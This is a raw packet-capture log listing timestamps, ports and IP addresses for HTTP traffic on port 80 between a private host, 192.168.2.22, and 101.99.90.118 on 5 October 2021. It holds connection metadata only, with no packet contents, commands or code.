Oct 5, 2021 22:18:04.150568962 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.150624990 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.150636911 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.150676966 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.150684118 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.150741100 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.150743008 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.150798082 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.150803089 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.150860071 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.150861025 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.150903940 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.150912046 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.150957108 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.150971889 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.151017904 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.151026964 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.151072025 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.151078939 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.151149035 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.151170969 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.151226044 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.151249886 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.151282072 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.151305914 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.151321888 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.151333094 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.151361942 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.151374102 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.151397943 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.151400089 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.151447058 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.151451111 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.151489973 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.151500940 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.151526928 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.151537895 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.151566982 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.151573896 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.151626110 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.151637077 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.151662111 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.151674032 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.151701927 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.151712894 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.151752949 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.197873116 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.197906017 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.197926998 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.197947025 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.197966099 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.197981119 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.197999954 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.198020935 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.198039055 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.198060036 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.198084116 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.198100090 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.198149920 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.198172092 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.198174000 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.198177099 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.198179007 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.199043036 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.199065924 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.199084997 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.199099064 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.199145079 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.199167967 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.199172974 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.199212074 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.199232101 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.199333906 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.199359894 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.199378014 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.199395895 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.199410915 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.199418068 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.199425936 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.199439049 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.199441910 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.199453115 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.199460983 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.199470043 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.199501038 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.200608969 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.200634956 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.200658083 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.200659037 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.200680017 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.200700998 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.200721979 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.200726032 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.200742960 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.200745106 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.200752020 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.200758934 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.200763941 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.200764894 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.200769901 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.200787067 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.200798988 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.200813055 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.200819016 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.200835943 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.200858116 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.200858116 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.200870991 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.200877905 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.201818943 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.201869011 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.201875925 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.201891899 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.201905012 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.201914072 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.201925039 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.201953888 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.202029943 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.202052116 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.202074051 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.202069998 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.202085018 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.202099085 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.202102900 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.202122927 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.202140093 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.202143908 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.202155113 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.202167034 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.202169895 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.202188969 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.202200890 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.202219963 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.203062057 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.203088999 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.203120947 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.203147888 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.203149080 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.203160048 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.203166962 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.203191042 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.203212023 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.203212976 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.203223944 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.203231096 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.203238010 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.203241110 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.203262091 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.203277111 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.203284025 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.203293085 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.203305960 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.203315973 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.203327894 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.203337908 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.203349113 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.203362942 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.203382015 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.323831081 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.324058056 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.380776882 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.380840063 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.380891085 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.380939007 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.380985975 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.381035089 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.381040096 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.381062031 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.381077051 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.381083965 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.381130934 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.381134033 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.381181002 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.381181955 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.381223917 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.381230116 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.381267071 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.381277084 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.381314039 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.381325006 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.381364107 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.382041931 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.382087946 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.382096052 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.382133007 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.382145882 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.382183075 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.382194042 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.382227898 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.382241011 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.382275105 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.382288933 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.382323027 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.382337093 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.382374048 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.382385015 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.382419109 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.382432938 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.382467985 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.382479906 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.382512093 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.382527113 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.382560015 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.382575035 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.382607937 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.383564949 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.383616924 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.383618116 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.383656979 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.383666039 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.383701086 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.383713961 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.383748055 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.383761883 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.383795977 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.383810997 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.383843899 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.383858919 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.383892059 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.383908987 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.383940935 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.383955956 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.383987904 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.384002924 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.384037018 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.384051085 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.384083033 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.384099007 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.384131908 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.385231972 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.385286093 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.385291100 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.385334015 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.385344982 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.385375977 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.385384083 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.385426044 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.385432005 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.385473013 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.385479927 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.385520935 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.385528088 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.385569096 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.385576010 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.385613918 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.385622978 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.385663033 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.385670900 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.385710955 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.385718107 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.385756969 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.385766029 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.385804892 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.494786978 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.495038986 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.562056065 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.562087059 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.562104940 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.562144041 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.562164068 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.562186003 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.562207937 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.562232018 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.562254906 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.562277079 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.562299013 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.562316895 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.562402010 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.562452078 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.565454006 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.565499067 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.565529108 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.565560102 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.565588951 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.565587044 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.565622091 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.565623999 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.565629959 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.565654039 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.565690994 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.565712929 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.565721989 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.565738916 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.565742016 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.565776110 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.565804958 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.565828085 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.565834045 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.565913916 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.565956116 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.565962076 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.566011906 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.566021919 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.566031933 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.566072941 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.566076994 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.566114902 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.566122055 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.566174984 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.566215992 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.566237926 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.566245079 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.566282034 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.566287041 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.566334963 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.566348076 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.566394091 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.566425085 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.566450119 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.566478968 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.566500902 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.566503048 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.566546917 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.566585064 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.566622972 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.566643953 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.566673040 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.566700935 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.566721916 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.566740036 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.566829920 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.566927910 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.566966057 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.566979885 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.566984892 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.566989899 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.566993952 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.567140102 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.567163944 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.567188978 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.567214012 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.567234993 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.567255974 CEST	49169	80	192.168.2.22	101.99.90.118
